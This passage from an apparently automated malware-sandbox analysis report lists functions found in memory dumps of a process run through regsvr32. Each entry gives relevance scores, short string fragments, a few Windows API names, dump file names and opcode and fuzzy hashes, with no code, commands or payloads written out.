                                                                                                                      Function 00000001800151CC Relevance: 8.3, Strings: 6, Instructions: 775COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :t@$Cctv$G)$[L:$bGVv$;XX
                                                                                                                      • API String ID: 0-2651510874
                                                                                                                      • Opcode ID: ebefbefb228ea4221a23a3db34240f10d752f79d03699ae3247339b7e600d81d
                                                                                                                      • Instruction ID: 3fa13f87646e341335cf2d5da82a9ab907462438b0e8e4c36472bc32e17a151b
                                                                                                                      • Opcode Fuzzy Hash: ebefbefb228ea4221a23a3db34240f10d752f79d03699ae3247339b7e600d81d
                                                                                                                      • Instruction Fuzzy Hash: 9D820275A0670CCBCBA8DF68C18A69D7BF1FF54348F104129EC5A9B261D774D829CB88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180023B54 Relevance: 7.7, Strings: 6, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #~|$&j$EA$a'$a'$]Y
                                                                                                                      • API String ID: 0-1695939866
                                                                                                                      • Opcode ID: 378c48654ee1750df59a6c890e7bacabbcca463348e7dfcb63075c49c87dc93a
                                                                                                                      • Instruction ID: e21423faf12df89bff477ce7a7495e34c55c19d60d0c56de6aa05514e7b9627f
                                                                                                                      • Opcode Fuzzy Hash: 378c48654ee1750df59a6c890e7bacabbcca463348e7dfcb63075c49c87dc93a
                                                                                                                      • Instruction Fuzzy Hash: 1F811C70A0878C8FDB99CFE4C08ABDEBBF2EB14348F40452DD506BA299D7749519CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A01FF0 Relevance: 7.6, APIs: 5, Instructions: 53timethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32 ref: 61A02035
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 61A02040
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 61A02048
                                                                                                                      • GetTickCount.KERNEL32 ref: 61A02050
                                                                                                                      • QueryPerformanceCounter.KERNEL32 ref: 61A0205D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1445889803-0
                                                                                                                      • Opcode ID: 07f1efd6a6b49b466c5d8cb1696e7f507847fd6b83d5e97e611cb4f05dbc318d
                                                                                                                      • Instruction ID: 56fbd3b80dacd7bf0b75d8b5d1f59e20703d7f91e419d7bdd650baa9cb1302f8
                                                                                                                      • Opcode Fuzzy Hash: 07f1efd6a6b49b466c5d8cb1696e7f507847fd6b83d5e97e611cb4f05dbc318d
                                                                                                                      • Instruction Fuzzy Hash: 1B117036216B1185F7119FA5F8047952262B75D7BAF4C1635EDAD027A0DA3DC4A5C301
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001A4D0 Relevance: 7.0, Strings: 5, Instructions: 738COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +^HA$GE($WnaS$x;u$^A
                                                                                                                      • API String ID: 0-1612960799
                                                                                                                      • Opcode ID: d1bb413db5342d13236a5252f506a007732f7f1951add3ff43b4ad9bf9783fe2
                                                                                                                      • Instruction ID: ade12ba945beac2eccb9b202867825156fa00f31183fc119c9a734923265b1be
                                                                                                                      • Opcode Fuzzy Hash: d1bb413db5342d13236a5252f506a007732f7f1951add3ff43b4ad9bf9783fe2
                                                                                                                      • Instruction Fuzzy Hash: 8582527054878B8FCB78CF54C845BEEBBE0FB84344F11852DE86A8BA51E7B49648DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800123C4 Relevance: 7.0, Strings: 5, Instructions: 724COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ~!$)|?$Gg$znG$]
                                                                                                                      • API String ID: 0-3919302544
                                                                                                                      • Opcode ID: 32de2dcebff0374593804b0e7094616ad12da305c18c34de7d75ec55dcef621e
                                                                                                                      • Instruction ID: e13b212153971c9eb02a2710c78321ed4094e0214168ed3f9ff77940122585c0
                                                                                                                      • Opcode Fuzzy Hash: 32de2dcebff0374593804b0e7094616ad12da305c18c34de7d75ec55dcef621e
                                                                                                                      • Instruction Fuzzy Hash: 3172EE7190674CCBCBA9DF68C28A6DD7BF1FF54308F105129EC1A9A265D7B0D829CB48
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180018074 Relevance: 6.9, Strings: 5, Instructions: 644COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6j>$:A$b=$mK`D$n2
                                                                                                                      • API String ID: 0-1550447772
                                                                                                                      • Opcode ID: 7e135a6aa02c4598783c3e55258971c7cbf1e84fdd5cab4d3eb216824c841b9e
                                                                                                                      • Instruction ID: ac79d797fc740dac7979eade9f146a0292363409bd1ba7e938d22e099dda0476
                                                                                                                      • Opcode Fuzzy Hash: 7e135a6aa02c4598783c3e55258971c7cbf1e84fdd5cab4d3eb216824c841b9e
                                                                                                                      • Instruction Fuzzy Hash: C66207B1A0474C8FEB98DFA8D09A6DEBBF1FB48344F00412DE846B7290D7749909CB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180015F90 Relevance: 6.9, Strings: 5, Instructions: 644COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a$!k"o$#8]$MN*$^q6
                                                                                                                      • API String ID: 0-934311000
                                                                                                                      • Opcode ID: a342133185aaac21085345e8195a13c79c8f12aecb6690fc4d159e1ea76cce31
                                                                                                                      • Instruction ID: b8d04421a3d58ce288d2eca7a5a58c8ab2ec1db2a388840500dd813fbd0f3cfe
                                                                                                                      • Opcode Fuzzy Hash: a342133185aaac21085345e8195a13c79c8f12aecb6690fc4d159e1ea76cce31
                                                                                                                      • Instruction Fuzzy Hash: 27624970908B448FE769CF78C58665EBBF0FB88744F204A1DE6A297271DB709945CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001E070 Relevance: 6.6, Strings: 5, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Ou$Sp$[&pS$e$e
                                                                                                                      • API String ID: 0-3967473514
                                                                                                                      • Opcode ID: b838546b4176569e34a1945ecef43ebb85bac28b155539e5881bc11cd77cdeba
                                                                                                                      • Instruction ID: 101c9f2e5feab9a172dba2483d3f9976fa746e93e3a65aae9dd55b09961dec4c
                                                                                                                      • Opcode Fuzzy Hash: b838546b4176569e34a1945ecef43ebb85bac28b155539e5881bc11cd77cdeba
                                                                                                                      • Instruction Fuzzy Hash: A312E870509B88CFDBB8DF24CC95AEF7BA5FB44346F10551DE84A8A290DBB4A648CF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180005080 Relevance: 6.6, Strings: 5, Instructions: 338COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$Z!|$ss_$y{t$ )
                                                                                                                      • API String ID: 0-2722653118
                                                                                                                      • Opcode ID: 7d5efc16f42b0844ecf84fbc5ebd30f81cc6e41ff778f15f35d4ac702dcc55ef
                                                                                                                      • Instruction ID: f3f3aea8617a373b237cc758d1d2a23631adaaffa2f666179efd7d4515aad235
                                                                                                                      • Opcode Fuzzy Hash: 7d5efc16f42b0844ecf84fbc5ebd30f81cc6e41ff778f15f35d4ac702dcc55ef
                                                                                                                      • Instruction Fuzzy Hash: 6402D1B1508749EFCB98CF28C489ADE7BF0FB48308F40852AF84A9B654D774DA59CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180005BFC Relevance: 6.5, Strings: 5, Instructions: 289COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *G~$2M$2M$@($71
                                                                                                                      • API String ID: 0-1260267515
                                                                                                                      • Opcode ID: ccf4e93f57bf365c828c5c8d8cf679fc6308ca5f235dcb1149029249039b82fe
                                                                                                                      • Instruction ID: a60b1c6429c9a0c710841cc410b4464ef82b670ed1cc530a53e0d0364d690f78
                                                                                                                      • Opcode Fuzzy Hash: ccf4e93f57bf365c828c5c8d8cf679fc6308ca5f235dcb1149029249039b82fe
                                                                                                                      • Instruction Fuzzy Hash: CAF1E771509B88CFDBF8CF24CC89AEB7BA5FB94306F50551DE8498A290DBB46649CF01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001DA38 Relevance: 6.5, Strings: 5, Instructions: 256COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6a$6a$Y8 M$$F#$-u
                                                                                                                      • API String ID: 0-3446220227
                                                                                                                      • Opcode ID: 27fa9943bc3e8c62a616c10e757d55ae8a4ff86197b547f3d234640ac06f980c
                                                                                                                      • Instruction ID: 8126f88596b706ed83af55e318b343352c2800260c5d8743873699bdf7eb83a0
                                                                                                                      • Opcode Fuzzy Hash: 27fa9943bc3e8c62a616c10e757d55ae8a4ff86197b547f3d234640ac06f980c
                                                                                                                      • Instruction Fuzzy Hash: 1FC1037151478CEBDBACCF28C88AADD3BA0FF44394F906219FD4686250C7B5D989CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000381C Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: WC$Gb$O~0$R,$\
                                                                                                                      • API String ID: 0-2327676338
                                                                                                                      • Opcode ID: 3f53c34cf11dabf75b68b6c47b2a7973301720c657f8908331559394a0c880fd
                                                                                                                      • Instruction ID: 1e9c95f8d19532dcc68671874b0177c57bea3b0f40d2692ca8e7d50082c1aafa
                                                                                                                      • Opcode Fuzzy Hash: 3f53c34cf11dabf75b68b6c47b2a7973301720c657f8908331559394a0c880fd
                                                                                                                      • Instruction Fuzzy Hash: 6CB133B1914B188FCF88DFA8C88A9DDBBF0FB48314F509219E856A7250D774A945CF98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001F1F0 Relevance: 5.5, Strings: 4, Instructions: 540COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8Hs$6<i$I$I
                                                                                                                      • API String ID: 0-3660419428
                                                                                                                      • Opcode ID: bbbbdc346c34a74b47b101373357184c089de64881e60b2eafde507b83114393
                                                                                                                      • Instruction ID: 9623f6038e7675015212ef51f323290aed2c5a127f930c375a5912d27c0d129c
                                                                                                                      • Opcode Fuzzy Hash: bbbbdc346c34a74b47b101373357184c089de64881e60b2eafde507b83114393
                                                                                                                      • Instruction Fuzzy Hash: D9520571915B888FEBB8CF68CC993DD7BB2FB88314F104219D80A9B251DB725668CF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180020DB0 Relevance: 5.2, Strings: 4, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HgX$P9C$a` $h
                                                                                                                      • API String ID: 0-609081406
                                                                                                                      • Opcode ID: fe56b32a8a9353e5dc900e83e6528203d4322037eb3f1070b63b54f8927d8826
                                                                                                                      • Instruction ID: 634dadb30669fb719531d894f4a7fd1ee8f4afe550b8a29671aa4bb51bddbe8e
                                                                                                                      • Opcode Fuzzy Hash: fe56b32a8a9353e5dc900e83e6528203d4322037eb3f1070b63b54f8927d8826
                                                                                                                      • Instruction Fuzzy Hash: 75C1B1B1C0435C8FDB68CFA9D98958DBBF1FB58308F20461DE859AB262DB749949CF40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180011270 Relevance: 4.2, Strings: 3, Instructions: 497COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .;$qj$$tD]
                                                                                                                      • API String ID: 0-1976487847
                                                                                                                      • Opcode ID: 02e24ff6ad4a8ee7fcae493fe90cd0f4742901c5b91873881614e018be9d0f74
                                                                                                                      • Instruction ID: 946a21ede28f6f00005b47886019b3e0ccc2c5ed1fa4bc79e6c940f5ff57e383
                                                                                                                      • Opcode Fuzzy Hash: 02e24ff6ad4a8ee7fcae493fe90cd0f4742901c5b91873881614e018be9d0f74
                                                                                                                      • Instruction Fuzzy Hash: 1F5207B190478C8BDBB8CF64C8896DD7BF0FB48318F50852DEA199B251DBB45784CB98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800073E8 Relevance: 4.1, Strings: 3, Instructions: 309COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A8K$[*$H7
                                                                                                                      • API String ID: 0-3429353871
                                                                                                                      • Opcode ID: ab053f1bac4f4871fceac939c9efd75fb21b96ec8dfa88a6271eda53d8d11ed5
                                                                                                                      • Instruction ID: 11c257d08aa4c82b18ded10a31af253af9f5be0f9f79ae3a17113bf014b4fc01
                                                                                                                      • Opcode Fuzzy Hash: ab053f1bac4f4871fceac939c9efd75fb21b96ec8dfa88a6271eda53d8d11ed5
                                                                                                                      • Instruction Fuzzy Hash: 02E1DF71A01709CBDB58DF28C69669D3BE5FF88304F40852DFC1A9B2A1D774E924CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000BA14 Relevance: 4.0, Strings: 3, Instructions: 289COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$"$2jF
                                                                                                                      • API String ID: 0-109344544
                                                                                                                      • Opcode ID: 4063491e86ee611ea6861ee21f3d2ddf56bee948e5e8c7249a6aed18dfeeb9b8
                                                                                                                      • Instruction ID: 52ee78195ecc86e5940a63b5ff5eb6ea43113a1592a0c3e715ab9c691a521fde
                                                                                                                      • Opcode Fuzzy Hash: 4063491e86ee611ea6861ee21f3d2ddf56bee948e5e8c7249a6aed18dfeeb9b8
                                                                                                                      • Instruction Fuzzy Hash: 64D11CB0E0470CDBDB59DF98E48A6DDBBF2FB58384F00411AF906B6290D7B49919CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001421C Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,6l$fK$pE"7
                                                                                                                      • API String ID: 0-371989378
                                                                                                                      • Opcode ID: 097dfba801f72f2e66606fc532ca1c2dfeab2d43e3fc144e74db166987210abb
                                                                                                                      • Instruction ID: 23ab844fdae078beeb23b93bc3dcc4213e42b7ab9852a442ed13044d5c4f7388
                                                                                                                      • Opcode Fuzzy Hash: 097dfba801f72f2e66606fc532ca1c2dfeab2d43e3fc144e74db166987210abb
                                                                                                                      • Instruction Fuzzy Hash: 45D12B7191870CCBDB69DF68D0897DD7BF1FB48344F109129F8269B2A2CB74994ACB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180005610 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X&$mo8$O~
                                                                                                                      • API String ID: 0-2010489101
                                                                                                                      • Opcode ID: 90ee163ef8aec2ec1c36f172b6d9dfbcb43a26db155a4d26a98e2324346f3ca6
                                                                                                                      • Instruction ID: 6a5313c3882841910a51942184fa071e55cd4ea5190554791fccfa72d789913c
                                                                                                                      • Opcode Fuzzy Hash: 90ee163ef8aec2ec1c36f172b6d9dfbcb43a26db155a4d26a98e2324346f3ca6
                                                                                                                      • Instruction Fuzzy Hash: BDC1277090479D8BCF58CFA8C88A6EE7BF1FB48354F10821DE846A7650D7B4D949CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001B3B0 Relevance: 4.0, Strings: 3, Instructions: 272COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &x|:$D@s$YNh
                                                                                                                      • API String ID: 0-2192453529
                                                                                                                      • Opcode ID: 83c029aa84023cf4d69aa125c34b2dccf3bfebd2f580cb1d0ab6948b351c2482
                                                                                                                      • Instruction ID: 348a56fa8083691f831204d942f1b13ee8a2b33249840f8d162b08bd876b867f
                                                                                                                      • Opcode Fuzzy Hash: 83c029aa84023cf4d69aa125c34b2dccf3bfebd2f580cb1d0ab6948b351c2482
                                                                                                                      • Instruction Fuzzy Hash: 4CC11171A0670CCBDB68CF28C58A6DD7BE1FF44344F205129EC1A972A2CB74D929CB49
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180023448 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PXl$S$C
                                                                                                                      • API String ID: 0-2035642645
                                                                                                                      • Opcode ID: 1bcee2d746eb2d35a2ad87bf3b410f35749b934617b0bda3abe5047dbd2fe6c0
                                                                                                                      • Instruction ID: 4bbd8cb7904dbe43877d3167fc8525a75e28c5546c7a073ca392484e67c7efa3
                                                                                                                      • Opcode Fuzzy Hash: 1bcee2d746eb2d35a2ad87bf3b410f35749b934617b0bda3abe5047dbd2fe6c0
                                                                                                                      • Instruction Fuzzy Hash: F1C1157450260CCBDBA9DF38C09A6D93BE1FF58308F61522DFC269A2A6D774D819CB44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001BDD8 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$r=h)$w?v,
                                                                                                                      • API String ID: 0-3790595521
                                                                                                                      • Opcode ID: d756ef4cbe5d5bddcb56d1d3ad8ff4d1d395cffef3e28b18f5befbc3774f7d9c
                                                                                                                      • Instruction ID: c284e9e8f778958fb587ed46bfe4096559694ddfb976799607315d93ace47f3a
                                                                                                                      • Opcode Fuzzy Hash: d756ef4cbe5d5bddcb56d1d3ad8ff4d1d395cffef3e28b18f5befbc3774f7d9c
                                                                                                                      • Instruction Fuzzy Hash: 83E167B590070DCFCB98DF68C48A59D7BB9FB59358F00412AFC0E9A260D3B4E919CB56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018002413C Relevance: 4.0, Strings: 3, Instructions: 239COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u}4$wT$G
                                                                                                                      • API String ID: 0-2599976194
                                                                                                                      • Opcode ID: 7eaf404f739c3aa72bcd25e83f7e89ad86590a917c3d279a9f6cc09775b2098a
                                                                                                                      • Instruction ID: 82f748eb59cefca28b9a3bf3ea328877a789a0b0fefec402cf1e1d12db3ce6b8
                                                                                                                      • Opcode Fuzzy Hash: 7eaf404f739c3aa72bcd25e83f7e89ad86590a917c3d279a9f6cc09775b2098a
                                                                                                                      • Instruction Fuzzy Hash: 36B19D715187889BD3EACF18C48579BB7E0FB98344F905A1EF886CB291CB74D948CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180026860 Relevance: 4.0, Strings: 3, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
